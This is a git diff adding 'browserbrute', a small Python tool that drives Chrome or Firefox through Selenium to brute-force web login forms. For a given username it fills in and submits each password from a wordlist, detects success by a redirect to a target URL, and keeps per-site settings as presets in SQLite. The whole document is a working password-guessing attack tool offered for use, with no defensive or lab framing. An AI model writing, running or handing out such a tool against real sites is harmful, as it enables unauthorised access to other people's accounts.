diff --git a/browserbrute.py b/browserbrute.py new file mode 100644 index 0000000..b28827a --- /dev/null +++ b/browserbrute.py @@ -0,0 +1,8 @@ +import lib.brute +import lib.parse +import lib.banner + +args=lib.parse.parser() +lib.banner.banner() + +lib.brute.brute(args) \ No newline at end of file diff --git a/lib/banner.py b/lib/banner.py new file mode 100644 index 0000000..048e87e --- /dev/null +++ b/lib/banner.py @@ -0,0 +1,27 @@ +def banner(): + print(''' + + + + ***** ** ***** ** + ****** *** ****** *** * + ** * * ** ** ** * * ** ** + * * * ** ** * * * ** ** + * * * *** **** **** ** *** **** **** *** **** * * * *** **** ** **** ******** + ** ** * **** **** * * *** * ** *** *** * * **** * *** **** **** * ** ** * **** **** * ** *** * ******** *** + ** ** * ** **** * **** ** *** **** ** **** * *** ** **** ** ** * ** **** ** **** ** * *** + ** *** ** ** ** ** ** ** **** * *** ** ** *** ** ** ** ** * *** + ** ** *** ** ** ** ** ** ** *** ** *** ** ** ** *** ** ** ** ** ** *** + ** ** *** ** ** ** ** ** ** *** ******** ** ** ** *** ** ** ** ** ******** + * ** ** ** ** ** ** ** ** *** ******* ** * ** ** ** ** ** ** ******* + * ** ** ** ** ** ** * **** ** ** ** * ** ** ** ** ** ** + **** *** *** ****** ******* ******* * **** * **** * *** **** *** *** ******* ** ** **** * + * ******** *** **** ***** ***** **** ******* *** * ******** *** ***** ** ** ******* + * **** ***** * **** ***** + * * + ** ** + + + + + ''') \ No newline at end of file diff --git a/lib/brute.py b/lib/brute.py new file mode 100644 index 0000000..ff37998 --- /dev/null +++ b/lib/brute.py @@ -0,0 +1,32 @@ +from selenium import webdriver +from selenium.webdriver.common.by import By +import lib.presets +import time + +def brute(args): + if args.command == "preset": + args=lib.presets.load_preset(args) + + if args.browser == "firefox": + driver = webdriver.Firefox() + else: + driver = webdriver.Chrome() + if args.command == "brute": + if args.makepreset: + lib.presets.make_preset(args.presetname,args.browser,str(args.url),args.userfield,args.passwordfield,args.formnumber,args.targeturl) + + with open(args.wordlist,"r") as wlist: + + for line in wlist: + driver.get(args.url) + ufield=driver.find_element(By.CSS_SELECTOR, f'[name="{args.userfield}"]') + ufield.send_keys(args.username) + pfield=driver.find_element(By.CSS_SELECTOR, f'[name="{args.passwordfield}"]') + pfield.send_keys(line.replace("\n","")) + forms=driver.find_elements(By.TAG_NAME,"form") + form=forms[int(args.formnumber)] + form.submit() + time.sleep(1) + if driver.current_url.startswith(args.targeturl): + print(f"{args.username} : {line}") + break diff --git a/lib/parse.py b/lib/parse.py new file mode 100644 index 0000000..be83e18 --- /dev/null +++ b/lib/parse.py @@ -0,0 +1,24 @@ +import argparse +def parser(): + parser = argparse.ArgumentParser(description="browser brute args") + subparse=parser.add_subparsers(dest="command") + + npparser=subparse.add_parser("brute") + npparser.add_argument("-b","--browser",required=True, choices=["chrome","firefox"]) + npparser.add_argument("-u","--url",required=True) + npparser.add_argument("-un","--username",required=True) + npparser.add_argument("-uf","--userfield",required=True) + npparser.add_argument("-pf","--passwordfield",required=True) + npparser.add_argument("-fn","--formnumber",required=True) + npparser.add_argument("-wl","--wordlist",required=True) + npparser.add_argument("-tu","--targeturl") + npparser.add_argument("-mp","--makepreset",action="store_true") + npparser.add_argument("-pn","--presetname") + + pparser=subparse.add_parser("preset") + pparser.add_argument("-pn","--presetname",required=True) + pparser.add_argument("-un","--username",required=True) + pparser.add_argument("-wl","--wordlist",required=True) + + args = parser.parse_args() + return args \ No newline at end of file diff --git a/lib/presets.py b/lib/presets.py new file mode 100644 index 0000000..1fac48e --- /dev/null +++ b/lib/presets.py @@ -0,0 +1,53 @@ +from sqlalchemy import create_engine, Column, String, Integer +from sqlalchemy.orm import sessionmaker, declarative_base +from os.path import exists +from os import mkdir + +Base=declarative_base() + +if not exists("dbs"): + mkdir("dbs") + +class Preset(Base): + __tablename__ = "Preset" + name = Column("name", String, primary_key = True) + browser = Column("browser", String) + url = Column("url", String) + userfield = Column("userfield", String) + passwordfield = Column("passwordfield", String) + formnumber = Column("formnumber", Integer) + targeturl = Column("targeturl", String) + + def __init__(self,name,browser,url,userfield,passwordfield,formnumber,targeturl): + self.name=name + self.browser=browser + self.url=url + self.userfield=userfield + self.passwordfield=passwordfield + self.formnumber=formnumber + self.targeturl=targeturl + +engine = create_engine("sqlite:///dbs/presets.db") +Base.metadata.create_all(bind=engine) + +Session = sessionmaker(bind=engine) +session = Session() + +def make_preset(name,browser,url,userfield,passwordfield,formnumber,targeturl): + print(url) + p=Preset(name,browser,url,userfield,passwordfield,int(formnumber),targeturl) + try: + session.add(p) + session.commit() + except Exception as e: + print(e) + +def load_preset(args): + p=session.query(Preset).filter(Preset.name==args.presetname).first() + args.browser = p.browser + args.url = p.url + args.userfield = p.userfield + args.passwordfield = p.passwordfield + args.formnumber = p.formnumber + args.targeturl = p.targeturl + return args